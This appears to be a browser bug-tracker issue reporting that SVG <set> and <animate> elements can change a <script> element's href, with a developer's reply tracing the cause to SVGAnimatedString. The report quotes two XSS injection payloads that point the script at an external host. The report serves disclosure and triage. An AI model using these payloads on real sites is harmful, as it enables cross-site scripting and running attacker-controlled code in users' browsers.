Issue 679291:
SVG animations on non-animatable elements.

Issue description

Clever folks have noted that it's possible to change the `href` attribute of a `<script>` element via things like `<set>` and `<animate>`.
This is somewhat useful for XSS attacks: injecting something like `<svg><set href=#x attributeName=href to=//14.rs />` or `<svg><animate href=#x attributeName=href to=//14.rs />` gets you code execution on the site.
The PoCs don't work in Firefox, and based on a quick skim of what I think is the relevant spec (https://svgwg.org/specs/animations/#AnimationAttributesAndProperties), this shouldn't be possible. Am I reading that right?
I've CC'd a few folks who know more about SVG than I do. Hopefully one of y'all can triage this to the right person. (fs@, I'm assigning it to you, since you're the last one to explicitly touch animation... thanks!)
I'm not marking this as RestrictView, as the discussion of the bug is already public.

The list in the link there applies specifically to the <animateMotion> element, a more pertinent spec link might be https://svgwg.org/svg2-draft/interact.html#ScriptElementHrefAttribute (the "Animatable: no" bit mostly.) I think we end up falling into this hole because of how 'href' on SVGScriptElement is actually an SVGAnimatedString (because it implements SVGURIReference. SVG 1.1 had the same setup, so this is nothing new.) So we have an SVGAnimatedString that can never be animated! href.baseValilicious!